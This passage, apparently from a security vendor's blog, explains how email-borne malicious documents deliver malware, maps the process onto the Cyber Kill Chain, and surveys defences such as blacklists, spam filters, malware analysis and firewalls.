Since the beginning of 2019, however, these types of document-based attacks have been increasing in frequency – dramatically. In the first quarter of the year, 59% of all malicious files detected were documents, compared to 41% the prior year.
Here’s a closer look at document-based malware attacks and solutions to help detect and block them.
Highlighted Threat
Document-Based Malware – Cybercriminals use email to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website. Common types of malware include viruses, trojans, spyware, worms and ransomware.
The Modern Framework for Malware Attacks
After decades of relying on signature-based methods, which could only be effective at stopping a malware strain once a signature was derived from it, security companies now think about malware detection by asking "What makes something malicious?" rather than "How do I detect things I know are malicious?" The focus is on attempting to detect indicators that a file might do harm before it is labeled as being harmful.
A common model used to better understand attacks is the Cyber Kill Chain, a seven-phase model of the steps most attackers take to breach a system:
· Reconnaissance - target selection and research
· Weaponization - crafting the attack on the target, often using malware and/or exploits
· Delivery - launching the attack
· Exploitation - using exploits delivered in the attack package
· Installation - creating persistence within the target's system
· Command and control - using the persistence from outside the network
· Actions on objective - achieving the objective that was the purpose of the attack, often exfiltration of data
Most malware is sent as spam to widely-circulated email lists, that are sold, traded, aggregated and revised as they move through the dark web. Combo lists like those used in the ongoing sextortion scams are a good example of this sort of list aggregation and usage in action.
Now that the attacker has a list of potential victims, the malware campaign (the delivery phase of the kill chain) can commence, using social engineering to get users to open an attached malicious document. Microsoft and Adobe file types are the most commonly used in document-based malware attacks, including Word, Excel, PowerPoint, Acrobat and pdf files.
Once the document is opened, either the malware is automatically installed or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks. The executable being downloaded and run when the malicious document is opened represents an installation phase in the kill chain.
Archive files and script files are the other two most common attachment-based distribution methods for malware. Attackers often play tricks with file extensions to try to confuse users and get them to open malicious documents.
Modern malware attacks are complex and layered; the solutions designed to detect and block them are, too.
Detecting and Blocking Malware Attacks
Blacklists — With IP space becoming increasingly limited, spammers are increasingly using their own infrastructure. Often, the same IPs are used long enough for software to detect and blacklist them. Even with hacked sites and botnets, it's possible to temporarily block attacks by IP once a large enough volume of spam has been detected.
Spam Filters / Phishing-Detection Systems — While many malicious emails appear convincing, spam filters, phishing-detection systems and related security software can pick up subtle clues and help block potentially-threatening messages and attachments from reaching email inboxes.
Malware Detection — For emails with malicious documents attached, both static and dynamic analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The URL for the executable can often be flagged using heuristics or threat intelligence systems. Obfuscation detected by static analysis can also indicate whether a document may be suspicious.
Advanced Firewall — If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.